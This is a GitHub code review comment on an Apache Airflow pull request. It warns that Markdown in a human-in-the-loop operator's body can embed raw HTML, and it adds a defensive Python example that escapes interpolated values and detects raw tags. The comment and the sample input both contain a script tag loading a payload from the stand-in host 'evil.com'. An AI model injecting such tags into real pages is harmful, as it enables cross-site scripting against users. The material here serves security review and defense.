ashb commented on code in PR #54166:
URL: https://github.com/apache/airflow/pull/54166#discussion_r2262275100


##########
providers/standard/src/airflow/providers/standard/example_dags/example_hitl_operator.py:
##########
@@ -125,10 +125,11 @@ def notify(self, context: Context) -> None:
         task_id="valid_input_and_options",
         subject="Are the following input and options valid?",
         body="""
-        Input: {{ 
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
-        Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] 
}}
-        Multiple Options: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
-        Timeout Option: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+**Collected Information**
+- Input: {{ 
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
+- Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Multiple Options: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Timeout Option: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}

Review Comment:
   > Markdown is "safe" in the way that it only allows formatting and NOT embedding JS code
   
   That isn't true at all. This is valid markdown:
   
   
   ```markdown
   ## Hi XSS
   
   <script src="evil.com/payload"></script>
   ```
   
   and will result in an HTML script tag.
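The following is an added example, not code from the Airflow project or from this review, showing the defender's side of the point above: escape human-supplied values before they are interpolated into a Markdown body, and run a pre-render check that flags raw HTML tags. It assumes a Markdown renderer that passes raw HTML through (the behaviour the comment describes); `BODY_TEMPLATE` is a stand-in with plain `{...}` placeholders for the Jinja `ti.xcom_pull(...)` expressions in the PR, the sample `information` value is constructed, and all function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Hypothetical stand-in for the HITL operator's `body` template: `{...}` placeholders
# replace the Jinja `ti.xcom_pull(...)` expressions in the PR so the example runs offline.
BODY_TEMPLATE = (
    "**Collected Information**\n"
    "- Input: {information}\n"
    "- Option: {option}\n"
)

# Constructed sample input: the `information` param a human typed into wait_for_input.
UNTRUSTED_INFORMATION = 'quarterly figures <script src="evil.com/payload"></script>'
OPTION = "Approve"


def escape_untrusted(value: object) -> str:
    """Neutralise HTML metacharacters so a Markdown renderer that passes raw HTML
    through emits the value as literal text instead of live markup."""
    return html.escape(str(value), quote=True)


class _RawTagCollector(HTMLParser):
    """Records every start tag the parser sees; used to spot raw HTML in Markdown."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def find_raw_html_tags(markdown_text: str) -> list[str]:
    """Return the raw HTML tag names embedded in a Markdown string (empty when clean).

    Caveat: this is a pre-render check, not a sanitiser. A tag quoted inside a
    Markdown code span is reported too, so treat hits as something to review,
    not as proof of an injection."""
    collector = _RawTagCollector()
    collector.feed(markdown_text)
    collector.close()
    return collector.tags


def build_body(information: object, option: object, escape: bool = True) -> str:
    """Interpolate the collected values into the body. `escape=False` reproduces
    the direct, unescaped interpolation the PR's template performs."""
    fmt = escape_untrusted if escape else str
    return BODY_TEMPLATE.format(information=fmt(information), option=fmt(option))


if __name__ == "__main__":
    unsafe = build_body(UNTRUSTED_INFORMATION, OPTION, escape=False)
    safe = build_body(UNTRUSTED_INFORMATION, OPTION)
    print("raw tags in unescaped body:", find_raw_html_tags(unsafe))  # ['script']
    print("raw tags in escaped body:  ", find_raw_html_tags(safe))    # []
```

In a real DAG the escaping would be done in the Jinja expression itself (the `| e` filter) or by rendering the body with a Markdown engine configured to drop raw HTML; `find_raw_html_tags` is the kind of check a CI step or a UI-side guard could run over the rendered body before it is shown to the approver.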


